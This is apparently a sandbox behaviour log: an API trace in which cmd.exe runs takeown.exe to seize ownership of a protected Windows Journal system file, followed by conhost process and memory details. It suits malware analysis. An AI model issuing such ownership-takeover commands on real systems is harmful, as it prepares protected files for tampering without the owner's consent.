(_String1="takeown", _String2="DIR") returned 16 [0301.470] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0301.470] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0301.470] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0301.470] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0301.471] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0301.471] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0301.471] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0301.471] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0301.471] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0301.471] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0301.471] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0301.471] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0301.471] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0301.471] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0301.471] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0301.471] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0301.471] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0301.471] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0301.471] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0301.471] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0301.471] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0301.471] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0301.471] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0301.471] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0301.471] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0301.471] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0301.471] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0301.471] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0301.471] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0301.471] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0301.471] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0301.471] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0301.471] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0301.471] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0301.471] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0301.471] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0301.471] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0301.471] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0301.471] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0301.471] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0301.471] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0301.471] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0301.471] SetErrorMode (uMode=0x0) returned 0x0 [0301.471] SetErrorMode (uMode=0x1) returned 0x0 [0301.471] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x103f8f8, lpFilePart=0xeef4bc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xeef4bc*="Desktop") returned 0x1d [0301.471] SetErrorMode (uMode=0x0) returned 0x1 [0301.472] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0301.472] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0301.472] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0301.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.472] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0xffffffff [0301.472] GetLastError () returned 0x2 [0301.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.472] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0xffffffff [0301.472] GetLastError () returned 0x2 [0301.472] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.472] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0x1030b68 [0301.472] FindClose (in: hFindFile=0x1030b68 | out: hFindFile=0x1030b68) returned 1 [0301.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0xffffffff [0301.473] GetLastError () returned 0x2 [0301.473] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0x1030b68 [0301.473] FindClose (in: hFindFile=0x1030b68 | out: hFindFile=0x1030b68) returned 1 [0301.473] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0301.473] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0301.473] GetConsoleTitleW (in: lpConsoleTitle=0xeef290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.473] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0301.473] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0301.473] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0301.473] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0301.473] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0301.473] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0301.473] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0301.473] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0301.473] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0301.473] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0301.473] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0301.473] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0301.473] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0301.473] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0301.473] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0301.473] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0301.473] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0301.473] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0301.473] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0301.474] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0301.474] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0301.474] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0301.474] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0301.474] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0301.474] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0301.474] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0301.474] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0301.474] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0301.474] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0301.474] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0301.474] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0301.474] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0301.474] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0301.474] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0301.474] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0301.474] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0301.474] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0301.474] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0301.474] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0301.474] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0301.474] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0301.474] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0301.474] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0301.474] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0301.474] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0301.474] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0301.474] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0301.474] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0301.474] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0301.474] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0301.474] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0301.474] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0301.474] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0301.474] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0301.474] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0301.474] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0301.474] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0301.474] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0301.474] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0301.474] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0301.474] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0301.474] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0301.474] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0301.474] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0301.474] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0301.474] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0301.474] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0301.474] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0301.474] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0301.475] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0301.475] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0301.475] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0301.475] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0301.475] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0301.475] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0301.475] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0301.475] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0301.475] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0301.475] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0301.475] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0301.475] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0301.475] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0301.475] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0301.475] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0301.475] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0301.475] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0301.475] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0301.475] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0301.475] SetErrorMode (uMode=0x0) returned 0x0 [0301.475] SetErrorMode (uMode=0x1) returned 0x0 [0301.475] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x103cd58, lpFilePart=0xeeed9c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xeeed9c*="Desktop") returned 0x1d [0301.475] SetErrorMode (uMode=0x0) returned 0x1 [0301.475] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0301.475] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0301.475] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0301.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.476] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0xffffffff [0301.476] GetLastError () returned 0x2 [0301.476] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.476] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0xffffffff [0301.476] GetLastError () returned 0x2 [0301.476] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0x1030b68 [0301.476] FindClose (in: hFindFile=0x1030b68 | out: hFindFile=0x1030b68) returned 1 [0301.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0xffffffff [0301.476] GetLastError () returned 0x2 [0301.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0x1030b68 [0301.476] FindClose (in: hFindFile=0x1030b68 | out: hFindFile=0x1030b68) returned 1 [0301.476] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0301.476] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0301.477] GetConsoleTitleW (in: lpConsoleTitle=0xeef01c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.477] InitializeProcThreadAttributeList (in: lpAttributeList=0xeeef48, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xeeef2c | out: lpAttributeList=0xeeef48, lpSize=0xeeef2c) returned 1 [0301.477] UpdateProcThreadAttribute (in: lpAttributeList=0xeeef48, dwFlags=0x0, Attribute=0x60001, lpValue=0xeeef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xeeef48, lpPreviousValue=0x0) returned 1 [0301.477] GetStartupInfoW (in: lpStartupInfo=0xeeef80 | out: lpStartupInfo=0xeeef80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0301.477] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0301.478] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0301.478] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0301.478] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xeeeed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xeeef1c | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\"", lpProcessInformation=0xeeef1c*(hProcess=0xb0, hThread=0xb8, dwProcessId=0xed0, dwThreadId=0x190)) returned 1 [0301.486] CloseHandle (hObject=0xb8) returned 1 [0301.487] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0301.487] GetEnvironmentStringsW () returned 0x103b2f0* [0301.487] FreeEnvironmentStringsA (penv="=") returned 1 [0301.487] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) Thread: id = 1024 os_tid = 0xec8 Process: id = "154" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x72552000" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "153" os_parent_pid = "0xcf0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10514 start_va = 0x7fa2c000 end_va = 0x7fa2cfff entry_point = 0x0 region_type = private name = "private_0x000000007fa2c000" filename = "" Region: id = 10515 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10516 start_va = 0xbc56500000 end_va = 0xbc5651ffff entry_point = 0x0 region_type = private name = "private_0x000000bc56500000" filename = "" Region: id = 10517 start_va = 0xbc56520000 end_va = 0xbc56533fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc56520000" filename = "" Region: id = 10518 start_va = 0xbc56540000 end_va = 0xbc5657ffff entry_point = 0x0 region_type = private name = "private_0x000000bc56540000" filename = "" Region: id = 10519 start_va = 0x7df5fffe0000 end_va = 0x7ff5fffdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffe0000" filename = "" Region: id = 10520 start_va = 0x7ff7fd3e0000 end_va = 0x7ff7fd402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd3e0000" filename = "" Region: id = 10521 start_va = 0x7ff7fd40d000 end_va = 0x7ff7fd40dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd40d000" filename = "" Region: id = 10522 start_va = 0x7ff7fd40e000 end_va = 0x7ff7fd40ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd40e000" filename = "" Region: id = 10523 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 10524 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10525 start_va = 0xbc56500000 end_va = 0xbc5650ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc56500000" filename = "" Region: id = 10526 start_va = 0xbc56580000 end_va = 0xbc5667ffff entry_point = 0x0 region_type = private name = "private_0x000000bc56580000" filename = "" Region: id = 10527 start_va = 0xbc56680000 end_va = 0xbc5673dfff entry_point = 0xbc56680000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10528 start_va = 0x7ff7fd2e0000 end_va = 0x7ff7fd3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd2e0000" filename = "" Region: id = 10529 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10530 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10531 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10532 start_va = 0xbc56740000 end_va = 0xbc5677ffff entry_point = 0x0 region_type = private name = "private_0x000000bc56740000" filename = "" Region: id = 10533 start_va = 0xbc56780000 end_va = 0xbc567affff entry_point = 0x0 region_type = private name = "private_0x000000bc56780000" filename = "" Region: id = 10534 start_va = 0x7ff7fd40b000 end_va = 0x7ff7fd40cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd40b000" filename = "" Region: id = 10535 start_va = 0xbc56510000 end_va = 0xbc56516fff entry_point = 0x0 region_type = private name = "private_0x000000bc56510000" filename = "" Region: id = 10536 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 10537 start_va = 0xbc56780000 end_va = 0xbc56780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000bc56780000" filename = "" Region: id = 10538 start_va = 0xbc567a0000 end_va = 0xbc567affff entry_point = 0x0 region_type = private name = "private_0x000000bc567a0000" filename = "" Region: id = 10539 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 10540 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10541 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10542 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10543 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 10544 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10545 start_va = 0xbc56790000 